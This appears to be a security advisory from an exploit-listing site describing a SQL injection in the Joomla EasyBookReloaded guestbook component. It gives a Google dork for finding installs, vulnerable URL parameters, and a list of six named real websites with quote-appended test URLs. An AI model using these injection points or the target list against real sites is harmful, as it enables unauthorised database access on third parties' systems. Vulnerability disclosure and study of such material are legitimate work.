Joomla EasyBookReloaded Components 3.3.2 SQL Injection

2019.02.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################### # Exploit Title : Joomla EasyBookReloaded Components 3.3.2 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 14/02/2019 # Vendor Homepage : joomla-extensions.kubik-rubik.de # Software Download Link : joomla-extensions.kubik-rubik.de/downloads/ebr-easybook-reloaded github.com/Kubik-Rubik/EBR-Easybook-Reloaded # Software Information Link : extensions.joomla.org/extension/easybook-reloaded/ # Software Affected Version : 2.5 and 3.3.2 compatible with Joomla 3.x # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_easybookreloaded'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Reference Link : packetstormsecurity.com/files/151667/Joomla-EasyBookReloaded-3.3.2-SQL-Injection.html #################################################################### # Description about Software : *************************** Easybook Reloaded is an easy to use and simple guestbook component for Joomla! which, nevertheless, offers you many useful features. User friendly, powerful guestbook component with many features #################################################################### # Impact : *********** Joomla EasyBookReloaded 3.3.2 and other versions - component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_easybookreloaded&controller=entry&Itemid=[SQL Injection] /index.php?option=com_easybookreloaded&view=easybookreloaded&limitstart=[SQL Injection] /index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=[SQL Injection] /index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=[ID-NUMBER]&limitstart=[SQL Injection] #################################################################### # Example Vulnerable Sites : ************************* [+] pa-lahat.net/index.php?option=com_easybookreloaded&controller=entry&Itemid=41%27 [+] capoeirasweden.se/iecapoeira/index.php?option=com_easybookreloaded&view=easybookreloaded&limitstart=30%27 [+] elivaniacosta.com.br/new/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=79%27 [+] let.elternvertretungen.de/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=76%27 [+] eneos-blond.de/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=60%27 [+] reise.pulverl.at/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=53%27 #################################################################### # Example SQL Database Error : **************************** Strict Standards: Non-static method JLoader::import() should not be called statically in /home/elivania/public_html/new /libraries/joomla/import.php on line 29 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################

References:

packetstormsecurity.com/files/151667/Joomla-EasyBookReloaded-3.3.2-SQL-Injection.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top